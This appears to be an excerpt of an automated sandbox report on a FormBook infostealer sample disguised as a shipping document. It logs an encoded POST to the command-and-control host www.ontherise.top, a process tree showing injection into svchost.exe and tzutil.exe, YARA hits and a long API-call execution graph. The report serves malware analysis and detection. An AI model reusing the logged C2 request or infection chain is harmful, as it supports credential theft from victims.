                                                              Dec 9, 2024 09:12:39.008033991 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 31 33 2e 31 31 33 31 39 39 2c 31 39 38 2e 31 36 38 32 31 20 63 20 34 37 2e 35 34 37 30 33 38 2c 30 2e 34 30 33 36 31 20 39 35 2e 30 39 33 30 37 31 2c 30 2e 38 30 37 32 31 20 31 34 32 2e 36 33 38 31
                                                              Data Ascii: d="m 13.113199,198.16821 c 47.547038,0.40361 95.093071,0.80721 142.638101,1.2108" style="display:inline;fill:none;stroke:#000000;stroke-width:1.00614154px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" />


Session ID:22
Source IP:192.168.2.4
Source Port:50025
Destination IP:162.0.213.94
Destination Port:80
PID:5592
Process:C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe

Timestamp:Dec 9, 2024 09:12:40.347446918 CET
Bytes transferred:761
Direction:OUT
Data:
POST /wr6c/ HTTP/1.1
                                                              Host: www.ontherise.top
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Cache-Control: no-cache
                                                              Content-Length: 225
                                                              Origin: http://www.ontherise.top
                                                              Referer: http://www.ontherise.top/wr6c/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                              Data Ascii: X25tIdT0=C0xkLyGCgnKq56wGnQoIg6c+gfGf7oxxtjMZLllIorQFWtGyYmKwBGOrxfCAvU1Z1qvxRGUIuXEeTG/XcbParKMT90fOxfYGNFRfDBWHUY6OvPpeYGptLDiu/23VDzIYFP6LdjwP1d4x+xUWGPiWe/jU6WbfTQ52syLu4noDCINHb4G4KOc4KgNn8lRUGf4BKwT8aQYLc442J662xaeV7eI=
Timestamp:Dec 9, 2024 09:12:41.548085928 CET
Bytes transferred:1236
Direction:IN
Data:
HTTP/1.1 404 Not Found
                                                              Date: Mon, 09 Dec 2024 08:12:41 GMT
                                                              Server: Apache
                                                              Content-Length: 16052
                                                              Connection: close
                                                              Content-Type: text/html



                                                              Target ID:0
                                                              Start time:03:09:35
                                                              Start date:09/12/2024
                                                              Path:C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe"
                                                              Imagebase:0x930000
                                                              File size:1'213'952 bytes
                                                              MD5 hash:0FAC19920FD79CAF5ABD90DA55B6A5E9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:1
                                                              Start time:03:09:39
                                                              Start date:09/12/2024
                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe"
                                                              Imagebase:0xab0000
                                                              File size:46'504 bytes
                                                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2221510574.0000000003B20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2221951172.0000000005600000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2221199653.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:5
                                                              Start time:03:10:23
                                                              Start date:09/12/2024
                                                              Path:C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe"
                                                              Imagebase:0x60000
                                                              File size:140'800 bytes
                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3520891709.0000000001320000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3521394310.00000000042D0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                              Reputation:high
                                                              Has exited:false

                                                              Target ID:6
                                                              Start time:03:10:24
                                                              Start date:09/12/2024
                                                              Path:C:\Windows\SysWOW64\tzutil.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\SysWOW64\tzutil.exe"
                                                              Imagebase:0x930000
                                                              File size:48'640 bytes
                                                              MD5 hash:31DE852CCF7CED517CC79596C76126B4
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3520159967.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3520903347.0000000003560000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3520852127.0000000003510000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:moderate
                                                              Has exited:false

                                                              Target ID:7
                                                              Start time:03:10:50
                                                              Start date:09/12/2024
                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                              Imagebase:0x7ff6bf500000
                                                              File size:676'768 bytes
                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true


                                                                Execution Graph

                                                                Execution Coverage:3.6%
                                                                Dynamic/Decrypted Code Coverage:1.3%
                                                                Signature Coverage:8.2%
                                                                Total number of Nodes:2000
                                                                Total number of Limit Nodes:162
calls __malloc_crt 104040->104066 104063 95a16b 58 API calls 2 library calls 104041->104063 104043 959cad 104064 95a1c8 58 API calls 8 library calls 104043->104064 104046 959cd5 104049 959cdc 104046->104049 104050 959ceb 104046->104050 104047->104032 104048 959cb4 104065 95309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 104048->104065 104067 958b28 58 API calls __getptd_noexit 104049->104067 104052 959c0b __lock 58 API calls 104050->104052 104054 959cf2 104052->104054 104056 959d17 104054->104056 104057 959cff 104054->104057 104069 952d55 104056->104069 104068 959e2b InitializeCriticalSectionAndSpinCount 104057->104068 104060 959d0b 104075 959d33 LeaveCriticalSection _doexit 104060->104075 104063->104043 104064->104048 104066->104046 104067->104047 104068->104060 104070 952d5e RtlFreeHeap 104069->104070 104074 952d87 _free 104069->104074 104071 952d73 104070->104071 104070->104074 104076 958b28 58 API calls __getptd_noexit 104071->104076 104073 952d79 GetLastError 104073->104074 104074->104060 104075->104047 104076->104073 104077->103958 104078->103963 104079->103974 104081 958dd1 104080->104081 104086 958c59 104081->104086 104085 958dec 104085->103977 104087 958c73 _memset ___raise_securityfailure 104086->104087 104088 958c93 IsDebuggerPresent 104087->104088 104094 95a155 SetUnhandledExceptionFilter UnhandledExceptionFilter 104088->104094 104091 958d57 ___raise_securityfailure 104095 95c5f6 104091->104095 104092 958d7a 104093 95a140 GetCurrentProcess TerminateProcess 104092->104093 104093->104085 104094->104091 104096 95c600 IsProcessorFeaturePresent 104095->104096 104097 95c5fe 104095->104097 104099 96590a 104096->104099 104097->104092 104102 9658b9 5 API calls 2 library calls 104099->104102 104101 9659ed 104101->104092 104102->104101 104104 95a4d4 EncodePointer 104103->104104 104104->104104 104105 95a4ee 104104->104105 104105->103981 104109 952c44 104106->104109 104108 952d4b 104108->103983 104110 952c50 __freefls@4 104109->104110 104117 
953217 104110->104117 104116 952c77 __freefls@4 104116->104108 104118 959c0b __lock 58 API calls 104117->104118 104119 952c59 104118->104119 104120 952c88 DecodePointer DecodePointer 104119->104120 104121 952cb5 104120->104121 104122 952c65 104120->104122 104121->104122 104134 9587a4 59 API calls strtoxl 104121->104134 104131 952c82 104122->104131 104124 952d18 EncodePointer EncodePointer 104124->104122 104125 952cc7 104125->104124 104126 952cec 104125->104126 104135 958864 61 API calls 2 library calls 104125->104135 104126->104122 104129 952d06 EncodePointer 104126->104129 104136 958864 61 API calls 2 library calls 104126->104136 104129->104124 104130 952d00 104130->104122 104130->104129 104137 953220 104131->104137 104134->104125 104135->104126 104136->104130 104140 959d75 LeaveCriticalSection 104137->104140 104139 952c87 104139->104116 104140->104139 104142 959c0b __lock 58 API calls 104141->104142 104143 953377 DecodePointer EncodePointer 104142->104143 104206 959d75 LeaveCriticalSection 104143->104206 104145 934849 104146 9533d4 104145->104146 104147 9533de 104146->104147 104148 9533f8 104146->104148 104147->104148 104207 958b28 58 API calls __getptd_noexit 104147->104207 104148->103991 104150 9533e8 104208 958db6 9 API calls strtoxl 104150->104208 104152 9533f3 104152->103991 104153->103993 104155 933b47 __write_nolock 104154->104155 104209 937667 104155->104209 104159 933b7a IsDebuggerPresent 104160 96d272 MessageBoxA 104159->104160 104161 933b88 104159->104161 104164 96d28c 104160->104164 104162 933c61 104161->104162 104161->104164 104165 933ba5 104161->104165 104163 933c68 SetCurrentDirectoryW 104162->104163 104166 933c75 Mailbox 104163->104166 104413 937213 59 API calls Mailbox 104164->104413 104295 937285 104165->104295 104166->103995 104169 96d29c 104174 96d2b2 SetCurrentDirectoryW 104169->104174 104171 933bc3 GetFullPathNameW 104172 937bcc 59 API calls 104171->104172 104173 933bfe 104172->104173 104311 94092d 104173->104311 104174->104166 104177 933c1c 
104178 933c26 104177->104178 104414 98874b AllocateAndInitializeSid CheckTokenMembership FreeSid 104177->104414 104327 933a46 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 104178->104327 104181 96d2cf 104181->104178 104184 96d2e0 104181->104184 104415 934706 104184->104415 104185 933c30 104187 933c43 104185->104187 104189 93434a 68 API calls 104185->104189 104335 9409d0 104187->104335 104188 96d2e8 104422 937de1 104188->104422 104189->104187 104192 933c4e 104192->104162 104412 93443a Shell_NotifyIconW _memset 104192->104412 104193 96d2f5 104194 96d324 104193->104194 104195 96d2ff 104193->104195 104197 937cab 59 API calls 104194->104197 104198 937cab 59 API calls 104195->104198 104199 96d320 GetForegroundWindow ShellExecuteW 104197->104199 104200 96d30a 104198->104200 104203 96d354 Mailbox 104199->104203 104203->104162 104206->104145 104207->104150 104208->104152 104210 950db6 Mailbox 59 API calls 104209->104210 104211 937688 104210->104211 104212 950db6 Mailbox 59 API calls 104211->104212 104213 933b51 GetCurrentDirectoryW 104212->104213 104214 933766 104213->104214 104215 937667 59 API calls 104214->104215 104216 93377c 104215->104216 104426 933d31 104216->104426 104218 93379a 104219 934706 61 API calls 104218->104219 104220 9337ae 104219->104220 104221 937de1 59 API calls 104220->104221 104222 9337bb 104221->104222 104440 934ddd 104222->104440 104225 96d173 104507 99955b 104225->104507 104226 9337dc Mailbox 104229 938047 59 API calls 104226->104229 104232 9337ef 104229->104232 104230 96d192 104231 952d55 _free 58 API calls 104230->104231 104234 96d19f 104231->104234 104464 93928a 104232->104464 104236 934e4a 84 API calls 104234->104236 104238 96d1a8 104236->104238 104242 933ed0 59 API calls 104238->104242 104239 937de1 59 API calls 104240 933808 104239->104240 104467 9384c0 104240->104467 104244 96d1c3 104242->104244 104243 93381a Mailbox 104245 937de1 59 API calls 104243->104245 104246 933ed0 59 API calls 104244->104246 104247 933840 104245->104247 
104248 96d1df 104246->104248 104249 9384c0 69 API calls 104247->104249 104250 934706 61 API calls 104248->104250 104253 93384f Mailbox 104249->104253 104251 96d204 104250->104251 104252 933ed0 59 API calls 104251->104252 104254 96d210 104252->104254 104255 937667 59 API calls 104253->104255 104256 938047 59 API calls 104254->104256 104257 93386d 104255->104257 104258 96d21e 104256->104258 104471 933ed0 104257->104471 104260 933ed0 59 API calls 104258->104260 104262 96d22d 104260->104262 104268 938047 59 API calls 104262->104268 104264 933887 104264->104238 104265 933891 104264->104265 104266 952efd _W_store_winword 60 API calls 104265->104266 104267 93389c 104266->104267 104267->104244 104269 9338a6 104267->104269 104270 96d24f 104268->104270 104271 952efd _W_store_winword 60 API calls 104269->104271 104272 933ed0 59 API calls 104270->104272 104273 9338b1 104271->104273 104275 96d25c 104272->104275 104273->104248 104274 9338bb 104273->104274 104276 952efd _W_store_winword 60 API calls 104274->104276 104275->104275 104277 9338c6 104276->104277 104277->104262 104278 933907 104277->104278 104280 933ed0 59 API calls 104277->104280 104278->104262 104279 933914 104278->104279 104487 9392ce 104279->104487 104281 9338ea 104280->104281 104283 938047 59 API calls 104281->104283 104285 9338f8 104283->104285 104288 933ed0 59 API calls 104285->104288 104288->104278 104290 93928a 59 API calls 104292 93394f 104290->104292 104291 938ee0 60 API calls 104291->104292 104292->104290 104292->104291 104293 933ed0 59 API calls 104292->104293 104294 933995 Mailbox 104292->104294 104293->104292 104294->104159 104296 937292 __write_nolock 104295->104296 104297 9372ab 104296->104297 104298 96ea22 _memset 104296->104298 105154 934750 104297->105154 104300 96ea3e GetOpenFileNameW 104298->104300 104302 96ea8d 104300->104302 104305 937bcc 59 API calls 104302->104305 104307 96eaa2 104305->104307 104307->104307 104308 9372c9 105182 93686a 104308->105182 104312 94093a __write_nolock 104311->104312 
105439 936d80 104312->105439 104314 94093f 104315 933c14 104314->104315 105450 94119e 89 API calls 104314->105450 104315->104169 104315->104177 104317 94094c 104317->104315 105451 943ee7 91 API calls Mailbox 104317->105451 104319 940955 104319->104315 104320 940959 GetFullPathNameW 104319->104320 104321 937bcc 59 API calls 104320->104321 104322 940985 104321->104322 104323 937bcc 59 API calls 104322->104323 104324 940992 104323->104324 104325 974cab _wcscat 104324->104325 104326 937bcc 59 API calls 104324->104326 104326->104315 104328 933ab0 LoadImageW RegisterClassExW 104327->104328 104329 96d261 104327->104329 105485 933041 7 API calls 104328->105485 105486 9347a0 LoadImageW EnumResourceNamesW 104329->105486 104332 933b34 104334 9339d5 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 104332->104334 104333 96d26a 104334->104185 104336 974cc3 104335->104336 104347 9409f5 104335->104347 105626 999e4a 89 API calls 4 library calls 104336->105626 104338 940cfa 104338->104192 104340 940ee4 104340->104338 104342 940ef1 104340->104342 105624 941093 331 API calls Mailbox 104342->105624 104343 940a4b PeekMessageW 104379 940a05 Mailbox 104343->104379 104345 940ef8 LockWindowUpdate DestroyWindow GetMessageW 104345->104338 104349 940f2a 104345->104349 104347->104379 105627 939e5d 60 API calls 104347->105627 105628 986349 331 API calls 104347->105628 104348 974e81 Sleep 104348->104379 104352 975c58 TranslateMessage DispatchMessageW GetMessageW 104349->104352 104350 940ce4 104350->104338 105623 941070 10 API calls Mailbox 104350->105623 104352->104352 104353 975c88 104352->104353 104353->104338 104354 940ea5 TranslateMessage DispatchMessageW 104355 940e43 PeekMessageW 104354->104355 104355->104379 104356 974d50 TranslateAcceleratorW 104356->104355 104356->104379 104357 950db6 59 API calls Mailbox 104357->104379 104358 940d13 timeGetTime 104358->104379 104359 97581f WaitForSingleObject 104361 97583c GetExitCodeProcess CloseHandle 104359->104361 104359->104379 104366 940f95 
104361->104366 104362 940e5f Sleep 104390 940e70 Mailbox 104362->104390 104363 938047 59 API calls 104363->104379 104364 937667 59 API calls 104364->104390 104366->104192 104367 975af8 Sleep 104367->104390 104368 93b73c 304 API calls 104368->104379 104370 95049f timeGetTime 104370->104390 104371 940f4e timeGetTime 105625 939e5d 60 API calls 104371->105625 104374 975b8f GetExitCodeProcess 104376 975ba5 WaitForSingleObject 104374->104376 104377 975bbb CloseHandle 104374->104377 104376->104377 104376->104379 104377->104390 104379->104343 104379->104348 104379->104350 104379->104354 104379->104355 104379->104356 104379->104357 104379->104358 104379->104359 104379->104362 104379->104363 104379->104366 104379->104367 104379->104368 104379->104371 104383 939e5d 60 API calls 104379->104383 104379->104390 104398 999e4a 89 API calls 104379->104398 104400 939c90 59 API calls Mailbox 104379->104400 104401 939ea0 304 API calls 104379->104401 104402 9384c0 69 API calls 104379->104402 104404 98617e 59 API calls Mailbox 104379->104404 104405 9755d5 VariantClear 104379->104405 104406 97566b VariantClear 104379->104406 104407 938cd4 59 API calls Mailbox 104379->104407 104408 975419 VariantClear 104379->104408 104409 986e8f 59 API calls 104379->104409 104410 937de1 59 API calls 104379->104410 104411 9389b3 69 API calls 104379->104411 105487 93e6a0 104379->105487 105518 93f460 104379->105518 105537 9331ce 104379->105537 105542 93e420 331 API calls 104379->105542 105543 93fce0 104379->105543 105629 9b6018 59 API calls 104379->105629 105630 999a15 59 API calls Mailbox 104379->105630 105631 98d4f2 59 API calls 104379->105631 105632 939837 104379->105632 105650 9860ef 59 API calls 2 library calls 104379->105650 105651 938401 59 API calls 104379->105651 105652 9382df 104379->105652 104381 9b5f25 110 API calls 104381->104390 104382 93b7dd 109 API calls 104382->104390 104383->104379 104384 975874 104384->104366 104385 975c17 Sleep 104385->104379 104386 975078 Sleep 104386->104379 104388 
937de1 59 API calls 104388->104390 104390->104364 104390->104366 104390->104370 104390->104374 104390->104379 104390->104381 104390->104382 104390->104384 104390->104385 104390->104386 104390->104388 105663 992408 60 API calls 104390->105663 105664 939e5d 60 API calls 104390->105664 105665 9389b3 69 API calls Mailbox 104390->105665 105666 93b73c 331 API calls 104390->105666 105667 9864da 60 API calls 104390->105667 105668 995244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 104390->105668 105669 993c55 66 API calls Mailbox 104390->105669 104398->104379 104400->104379 104401->104379 104402->104379 104404->104379 104405->104379 104406->104379 104407->104379 104408->104379 104409->104379 104410->104379 104411->104379 104412->104162 104413->104169 104414->104181 104416 961940 __write_nolock 104415->104416 104417 934713 GetModuleFileNameW 104416->104417 104418 937de1 59 API calls 104417->104418 104419 934739 104418->104419 104420 934750 60 API calls 104419->104420 104421 934743 Mailbox 104420->104421 104421->104188 104423 937df0 __wsetenvp _memmove 104422->104423 104424 950db6 Mailbox 59 API calls 104423->104424 104425 937e2e 104424->104425 104425->104193 104427 933d3e __write_nolock 104426->104427 104428 937bcc 59 API calls 104427->104428 104432 933ea4 Mailbox 104427->104432 104430 933d70 104428->104430 104438 933da6 Mailbox 104430->104438 104548 9379f2 104430->104548 104431 933e77 104431->104432 104433 937de1 59 API calls 104431->104433 104432->104218 104435 933e98 104433->104435 104434 937de1 59 API calls 104434->104438 104437 933f74 59 API calls 104435->104437 104436 9379f2 59 API calls 104436->104438 104437->104432 104438->104431 104438->104432 104438->104434 104438->104436 104551 933f74 104438->104551 104557 934bb5 104440->104557 104445 96d8e6 104448 934e4a 84 API calls 104445->104448 104446 934e08 LoadLibraryExW 104567 934b6a 104446->104567 104450 96d8ed 104448->104450 104451 934b6a 3 API calls 104450->104451 104453 96d8f5 
104451->104453 104593 934f0b 104453->104593 104454 934e2f 104454->104453 104455 934e3b 104454->104455 104457 934e4a 84 API calls 104455->104457 104459 9337d4 104457->104459 104459->104225 104459->104226 104461 96d91c 104601 934ec7 104461->104601 104463 96d929 104465 950db6 Mailbox 59 API calls 104464->104465 104466 9337fb 104465->104466 104466->104239 104468 9384cb 104467->104468 104469 9384f2 104468->104469 104855 9389b3 69 API calls Mailbox 104468->104855 104469->104243 104472 933ef3 104471->104472 104473 933eda 104471->104473 104475 937bcc 59 API calls 104472->104475 104474 938047 59 API calls 104473->104474 104476 933879 104474->104476 104475->104476 104477 952efd 104476->104477 104478 952f7e 104477->104478 104479 952f09 104477->104479 104858 952f90 60 API calls 3 library calls 104478->104858 104486 952f2e 104479->104486 104856 958b28 58 API calls __getptd_noexit 104479->104856 104482 952f8b 104482->104264 104483 952f15 104857 958db6 9 API calls strtoxl 104483->104857 104485 952f20 104485->104264 104486->104264 104488 9392d6 104487->104488 104489 950db6 Mailbox 59 API calls 104488->104489 104490 9392e4 104489->104490 104492 933924 104490->104492 104859 9391fc 59 API calls Mailbox 104490->104859 104493 939050 104492->104493 104860 939160 104493->104860 104495 950db6 Mailbox 59 API calls 104496 933932 104495->104496 104498 938ee0 104496->104498 104497 93905f 104497->104495 104497->104496 104499 96f17c 104498->104499 104503 938ef7 104498->104503 104499->104503 104887 938bdb 59 API calls Mailbox 104499->104887 104501 939040 104874 939d3c 104501->104874 104502 938ff8 104504 950db6 Mailbox 59 API calls 104502->104504 104503->104501 104503->104502 104506 938fff 104503->104506 104504->104506 104506->104292 104508 934ee5 85 API calls 104507->104508 104509 9995ca 104508->104509 104890 999734 104509->104890 104512 934f0b 74 API calls 104513 9995f7 104512->104513 104514 934f0b 74 API calls 104513->104514 104515 999607 104514->104515 104516 934f0b 74 API calls 
104515->104516 104517 999622 104516->104517 104518 934f0b 74 API calls 104517->104518 104519 99963d 104518->104519 104520 934ee5 85 API calls 104519->104520 104521 999654 104520->104521 104522 95571c __malloc_crt 58 API calls 104521->104522 104523 99965b 104522->104523 104524 95571c __malloc_crt 58 API calls 104523->104524 104525 999665 104524->104525 104526 934f0b 74 API calls 104525->104526 104527 999679 104526->104527 104528 999109 GetSystemTimeAsFileTime 104527->104528 104529 99968c 104528->104529 104530 9996a1 104529->104530 104531 9996b6 104529->104531 104534 952d55 _free 58 API calls 104530->104534 104532 99971b 104531->104532 104533 9996bc 104531->104533 104536 952d55 _free 58 API calls 104532->104536 104896 998b06 116 API calls __fcloseall 104533->104896 104537 9996a7 104534->104537 104539 96d186 104536->104539 104540 952d55 _free 58 API calls 104537->104540 104538 999713 104541 952d55 _free 58 API calls 104538->104541 104539->104230 104542 934e4a 104539->104542 104540->104539 104541->104539 104543 934e54 104542->104543 104547 934e5b 104542->104547 104897 9553a6 104543->104897 104545 934e7b FreeLibrary 104546 934e6a 104545->104546 104546->104230 104547->104545 104547->104546 104549 937e4f 59 API calls 104548->104549 104550 9379fd 104549->104550 104550->104430 104552 933f82 104551->104552 104556 933fa4 _memmove 104551->104556 104554 950db6 Mailbox 59 API calls 104552->104554 104553 950db6 Mailbox 59 API calls 104555 933fb8 104553->104555 104554->104556 104555->104438 104556->104553 104606 934c03 104557->104606 104560 934bf5 104564 95525b 104560->104564 104561 934bec FreeLibrary 104561->104560 104562 934c03 2 API calls 104563 934bdc 104562->104563 104563->104560 104563->104561 104610 955270 104564->104610 104566 934dfc 104566->104445 104566->104446 104770 934c36 104567->104770 104570 934b8f 104572 934ba1 FreeLibrary 104570->104572 104573 934baa 104570->104573 104571 934c36 2 API calls 104571->104570 104572->104573 104574 934c70 104573->104574 104575 950db6 
Mailbox 59 API calls 104574->104575 104576 934c85 104575->104576 104774 93522e 104576->104774 104578 934c91 _memmove 104579 934ccc 104578->104579 104580 934dc1 104578->104580 104581 934d89 104578->104581 104582 934ec7 69 API calls 104579->104582 104788 99991b 95 API calls 104580->104788 104777 934e89 CreateStreamOnHGlobal 104581->104777 104589 934cd5 104582->104589 104585 934f0b 74 API calls 104585->104589 104586 934d69 104586->104454 104588 96d8a7 104590 934ee5 85 API calls 104588->104590 104589->104585 104589->104586 104589->104588 104783 934ee5 104589->104783 104591 96d8bb 104590->104591 104592 934f0b 74 API calls 104591->104592 104592->104586 104594 934f1d 104593->104594 104597 96d9cd 104593->104597 104812 9555e2 104594->104812 104598 999109 104832 998f5f 104598->104832 104600 99911f 104600->104461 104602 934ed6 104601->104602 104603 96d990 104601->104603 104837 955c60 104602->104837 104605 934ede 104605->104463 104607 934bd0 104606->104607 104608 934c0c LoadLibraryA 104606->104608 104607->104562 104607->104563 104608->104607 104609 934c1d GetProcAddress 104608->104609 104609->104607 104612 95527c __freefls@4 104610->104612 104611 95528f 104659 958b28 58 API calls __getptd_noexit 104611->104659 104612->104611 104614 9552c0 104612->104614 104629 9604e8 104614->104629 104615 955294 104660 958db6 9 API calls strtoxl 104615->104660 104618 9552c5 104619 9552ce 104618->104619 104620 9552db 104618->104620 104661 958b28 58 API calls __getptd_noexit 104619->104661 104622 955305 104620->104622 104623 9552e5 104620->104623 104644 960607 104622->104644 104662 958b28 58 API calls __getptd_noexit 104623->104662 104624 95529f @_EH4_CallFilterFunc@8 __freefls@4 104624->104566 104630 9604f4 __freefls@4 104629->104630 104631 959c0b __lock 58 API calls 104630->104631 104642 960502 104631->104642 104632 96057d 104669 95881d 58 API calls __malloc_crt 104632->104669 104633 960576 104664 9605fe 104633->104664 104636 960584 104636->104633 104670 959e2b 
InitializeCriticalSectionAndSpinCount 104636->104670 104637 9605f3 __freefls@4 104637->104618 104639 959c93 __mtinitlocknum 58 API calls 104639->104642 104641 9605aa EnterCriticalSection 104641->104633 104642->104632 104642->104633 104642->104639 104667 956c50 59 API calls __lock 104642->104667 104668 956cba LeaveCriticalSection LeaveCriticalSection _doexit 104642->104668 104645 960627 __wopenfile 104644->104645 104646 960641 104645->104646 104658 9607fc 104645->104658 104677 9537cb 60 API calls 2 library calls 104645->104677 104675 958b28 58 API calls __getptd_noexit 104646->104675 104648 960646 104676 958db6 9 API calls strtoxl 104648->104676 104650 955310 104663 955332 LeaveCriticalSection LeaveCriticalSection _fseek 104650->104663 104651 96085f 104672 9685a1 104651->104672 104654 9607f5 104654->104658 104678 9537cb 60 API calls 2 library calls 104654->104678 104656 960814 104656->104658 104679 9537cb 60 API calls 2 library calls 104656->104679 104658->104646 104658->104651 104659->104615 104660->104624 104661->104624 104662->104624 104663->104624 104671 959d75 LeaveCriticalSection 104664->104671 104666 960605 104666->104637 104667->104642 104668->104642 104669->104636 104670->104641 104671->104666 104680 967d85 104672->104680 104674 9685ba 104674->104650 104675->104648 104676->104650 104677->104654 104678->104656 104679->104658 104683 967d91 __freefls@4 104680->104683 104681 967da7 104767 958b28 58 API calls __getptd_noexit 104681->104767 104683->104681 104685 967ddd 104683->104685 104684 967dac 104768 958db6 9 API calls strtoxl 104684->104768 104691 967e4e 104685->104691 104688 967df9 104769 967e22 LeaveCriticalSection __unlock_fhandle 104688->104769 104690 967db6 __freefls@4 104690->104674 104692 967e6e 104691->104692 104693 9544ea __wsopen_nolock 58 API calls 104692->104693 104696 967e8a 104693->104696 104694 967fc1 104695 958dc6 __invoke_watson 8 API calls 104694->104695 104697 9685a0 104695->104697 104696->104694 104698 967ec4 104696->104698 104706 967ee7 
104696->104706 104699 967d85 __wsopen_helper 103 API calls 104697->104699 104700 958af4 __commit 58 API calls 104698->104700 104701 9685ba 104699->104701 104702 967ec9 104700->104702 104701->104688 104703 958b28 strtoxl 58 API calls 104702->104703 104704 967ed6 104703->104704 104707 958db6 strtoxl 9 API calls 104704->104707 104705 967fa5 104708 958af4 __commit 58 API calls 104705->104708 104706->104705 104714 967f83 104706->104714 104709 967ee0 104707->104709 104710 967faa 104708->104710 104709->104688 104711 958b28 strtoxl 58 API calls 104710->104711 104712 967fb7 104711->104712 104713 958db6 strtoxl 9 API calls 104712->104713 104713->104694 104715 95d294 __alloc_osfhnd 61 API calls 104714->104715 104716 968051 104715->104716 104717 96807e 104716->104717 104718 96805b 104716->104718 104720 967cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 104717->104720 104719 958af4 __commit 58 API calls 104718->104719 104721 968060 104719->104721 104728 9680a0 104720->104728 104722 958b28 strtoxl 58 API calls 104721->104722 104724 96806a 104722->104724 104723 96811e GetFileType 104725 96816b 104723->104725 104726 968129 GetLastError 104723->104726 104730 958b28 strtoxl 58 API calls 104724->104730 104736 95d52a __set_osfhnd 59 API calls 104725->104736 104731 958b07 __dosmaperr 58 API calls 104726->104731 104727 9680ec GetLastError 104729 958b07 __dosmaperr 58 API calls 104727->104729 104728->104723 104728->104727 104732 967cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 104728->104732 104733 968111 104729->104733 104730->104709 104734 968150 CloseHandle 104731->104734 104735 9680e1 104732->104735 104738 958b28 strtoxl 58 API calls 104733->104738 104734->104733 104737 96815e 104734->104737 104735->104723 104735->104727 104742 968189 104736->104742 104739 958b28 strtoxl 58 API calls 104737->104739 104738->104694 104740 968163 104739->104740 104740->104733 104741 968344 104741->104694 104744 968517 CloseHandle 104741->104744 104742->104741 104743 9618c1 
